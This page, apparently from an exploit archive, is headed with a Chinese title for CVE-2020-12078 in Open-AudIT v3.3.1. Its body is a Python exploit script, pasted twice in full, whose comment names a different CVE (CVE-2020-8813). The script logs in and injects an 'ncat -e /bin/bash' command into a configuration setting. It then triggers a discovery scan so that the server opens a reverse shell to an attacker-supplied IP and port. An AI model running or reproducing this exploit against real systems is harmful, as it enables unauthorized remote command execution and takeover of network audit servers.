CVE-2020-12078_Open-AudIT_v3.3.1_遠程命令執行漏洞

# CVE-2020-12078 Open-AudIT v3.3.1 遠程命令執行漏洞

==漏洞影響==

Open-AudIT v3.3.1

==EXP==

#!/usr/bin/python3

# Exploit Title: Open-AudIT Professional v3.3.1 Remote Code Execution
# Date: 22/04/2020
# Exploit Author: Askar (@mohammadaskar2)
# CVE: CVE-2020-8813
# Vendor Homepage: https://opmantek.com/
# Version: v3.3.1
# Tested on: Ubuntu 18.04 / PHP 7.2.24

import requests
import sys
import warnings
import random
import string
from bs4 import BeautifulSoup
from urllib.parse import quote

warnings.filterwarnings("ignore", category=UserWarning, module='bs4')


if len(sys.argv) != 6:
   print("[~] Usage : ./openaudit-exploit.py url username password ip port")
   exit()

url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]

request = requests.session()

def inject_payload():
   configuration_path = url+"/en/omk/open-audit/configuration/90"
   data = 'data={"data":{"id":"90","type":"configuration","attributes":{"value":";ncat${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s${IFS};"}}}' % (ip, port)
   request.patch(configuration_path, data)
   print("[+] Payload injected in settings")


def start_discovery():
   discovery_path = url+"/en/omk/open-audit/discoveries/create"
   post_discovery_path = url+"/en/omk/open-audit/discoveries"
   scan_name = "".join([random.choice(string.ascii_uppercase) for i in range(10)])
   req = request.get(discovery_path)

   response = req.text
   soup = BeautifulSoup(response, "html5lib")
   token = soup.findAll('input')[5].get("value")
   buttons = soup.findAll("button")
   headers = {"Referer" : discovery_path}
   request_data = {
   "data[attributes][name]":scan_name,
   "data[attributes][other][subnet]":"10.10.10.1/24",
   "data[attributes][other][ad_server]":"",
   "data[attributes][other][ad_domain]":"",
   "submit":"",
   "data[type]":"discoveries",
   "data[access_token]":token,
   "data[attributes][complete]":"y",
   "data[attributes][org_id]":"1",
   "data[attributes][type]":"subnet",
   "data[attributes][devices_assigned_to_org]":"",
   "data[attributes][devices_assigned_to_location]":"",
   "data[attributes][other][nmap][discovery_scan_option_id]":"1",
   "data[attributes][other][nmap][ping]":"y",
   "data[attributes][other][nmap][service_version]":"n",
   "data[attributes][other][nmap][open|filtered]":"n",
   "data[attributes][other][nmap][filtered]":"n",
   "data[attributes][other][nmap][timing]":"4",
   "data[attributes][other][nmap][nmap_tcp_ports]":"0",
   "data[attributes][other][nmap][nmap_udp_ports]":"0",
   "data[attributes][other][nmap][tcp_ports]":"22,135,62078",
   "data[attributes][other][nmap][udp_ports]":"161",
   "data[attributes][other][nmap][timeout]":"",
   "data[attributes][other][nmap][exclude_tcp_ports]":"",
   "data[attributes][other][nmap][exclude_udp_ports]":"",
   "data[attributes][other][nmap][exclude_ip]":"",
   "data[attributes][other][nmap][ssh_ports]":"22",
   "data[attributes][other][match][match_dbus]":"",
   "data[attributes][other][match][match_fqdn]":"",
   "data[attributes][other][match][match_dns_fqdn]":"",
   "data[attributes][other][match][match_dns_hostname]":"",
   "data[attributes][other][match][match_hostname]":"",
   "data[attributes][other][match][match_hostname_dbus]":"",
   "data[attributes][other][match][match_hostname_serial]":"",
   "data[attributes][other][match][match_hostname_uuid]":"",
   "data[attributes][other][match][match_ip]":"",
   "data[attributes][other][match][match_ip_no_data]":"",
   "data[attributes][other][match][match_mac]":"",
   "data[attributes][other][match][match_mac_vmware]":"",
   "data[attributes][other][match][match_serial]":"",
   "data[attributes][other][match][match_serial_type]":"",
   "data[attributes][other][match][match_sysname]":"",
   "data[attributes][other][match][match_sysname_serial]":"",
   "data[attributes][other][match][match_uuid]":""

   }
   print("[+] Creating discovery ..")
   req = request.post(post_discovery_path, data=request_data, headers=headers, allow_redirects=False)
   disocvery_url = url + req.headers['Location'] + "/execute"
   print("[+] Triggering payload ..")
   print("[+] Check your nc ;)")
   request.get(disocvery_url)


def login():
   login_info = {
   "redirect_url": "/en/omk/open-audit",
   "username": username,
   "password": password
   }
   login_request = request.post(url+"/en/omk/open-audit/login", login_info)
   login_text = login_request.text
   if "There was an error authenticating" in login_text:
       return False
   else:
       return True

if login():
   print("[+] LoggedIn Successfully")
   inject_payload()
   start_discovery()
else:
   print("[-] Cannot login!")

==漏洞影響==

Open-AudIT v3.3.1

==EXP==

#!/usr/bin/python3

# Exploit Title: Open-AudIT Professional v3.3.1 Remote Code Execution
# Date: 22/04/2020
# Exploit Author: Askar (@mohammadaskar2)
# CVE: CVE-2020-8813
# Vendor Homepage: https://opmantek.com/
# Version: v3.3.1
# Tested on: Ubuntu 18.04 / PHP 7.2.24

import requests
import sys
import warnings
import random
import string
from bs4 import BeautifulSoup
from urllib.parse import quote

warnings.filterwarnings("ignore", category=UserWarning, module='bs4')


if len(sys.argv) != 6:
   print("[~] Usage : ./openaudit-exploit.py url username password ip port")
   exit()

url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]

request = requests.session()

def inject_payload():
   configuration_path = url+"/en/omk/open-audit/configuration/90"
   data = 'data={"data":{"id":"90","type":"configuration","attributes":{"value":";ncat${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s${IFS};"}}}' % (ip, port)
   request.patch(configuration_path, data)
   print("[+] Payload injected in settings")


def start_discovery():
   discovery_path = url+"/en/omk/open-audit/discoveries/create"
   post_discovery_path = url+"/en/omk/open-audit/discoveries"
   scan_name = "".join([random.choice(string.ascii_uppercase) for i in range(10)])
   req = request.get(discovery_path)

   response = req.text
   soup = BeautifulSoup(response, "html5lib")
   token = soup.findAll('input')[5].get("value")
   buttons = soup.findAll("button")
   headers = {"Referer" : discovery_path}
   request_data = {
   "data[attributes][name]":scan_name,
   "data[attributes][other][subnet]":"10.10.10.1/24",
   "data[attributes][other][ad_server]":"",
   "data[attributes][other][ad_domain]":"",
   "submit":"",
   "data[type]":"discoveries",
   "data[access_token]":token,
   "data[attributes][complete]":"y",
   "data[attributes][org_id]":"1",
   "data[attributes][type]":"subnet",
   "data[attributes][devices_assigned_to_org]":"",
   "data[attributes][devices_assigned_to_location]":"",
   "data[attributes][other][nmap][discovery_scan_option_id]":"1",
   "data[attributes][other][nmap][ping]":"y",
   "data[attributes][other][nmap][service_version]":"n",
   "data[attributes][other][nmap][open|filtered]":"n",
   "data[attributes][other][nmap][filtered]":"n",
   "data[attributes][other][nmap][timing]":"4",
   "data[attributes][other][nmap][nmap_tcp_ports]":"0",
   "data[attributes][other][nmap][nmap_udp_ports]":"0",
   "data[attributes][other][nmap][tcp_ports]":"22,135,62078",
   "data[attributes][other][nmap][udp_ports]":"161",
   "data[attributes][other][nmap][timeout]":"",
   "data[attributes][other][nmap][exclude_tcp_ports]":"",
   "data[attributes][other][nmap][exclude_udp_ports]":"",
   "data[attributes][other][nmap][exclude_ip]":"",
   "data[attributes][other][nmap][ssh_ports]":"22",
   "data[attributes][other][match][match_dbus]":"",
   "data[attributes][other][match][match_fqdn]":"",
   "data[attributes][other][match][match_dns_fqdn]":"",
   "data[attributes][other][match][match_dns_hostname]":"",
   "data[attributes][other][match][match_hostname]":"",
   "data[attributes][other][match][match_hostname_dbus]":"",
   "data[attributes][other][match][match_hostname_serial]":"",
   "data[attributes][other][match][match_hostname_uuid]":"",
   "data[attributes][other][match][match_ip]":"",
   "data[attributes][other][match][match_ip_no_data]":"",
   "data[attributes][other][match][match_mac]":"",
   "data[attributes][other][match][match_mac_vmware]":"",
   "data[attributes][other][match][match_serial]":"",
   "data[attributes][other][match][match_serial_type]":"",
   "data[attributes][other][match][match_sysname]":"",
   "data[attributes][other][match][match_sysname_serial]":"",
   "data[attributes][other][match][match_uuid]":""

   }
   print("[+] Creating discovery ..")
   req = request.post(post_discovery_path, data=request_data, headers=headers, allow_redirects=False)
   disocvery_url = url + req.headers['Location'] + "/execute"
   print("[+] Triggering payload ..")
   print("[+] Check your nc ;)")
   request.get(disocvery_url)


def login():
   login_info = {
   "redirect_url": "/en/omk/open-audit",
   "username": username,
   "password": password
   }
   login_request = request.post(url+"/en/omk/open-audit/login", login_info)
   login_text = login_request.text
   if "There was an error authenticating" in login_text:
       return False
   else:
       return True

if login():
   print("[+] LoggedIn Successfully")
   inject_payload()
   start_discovery()
else:
   print("[-] Cannot login!")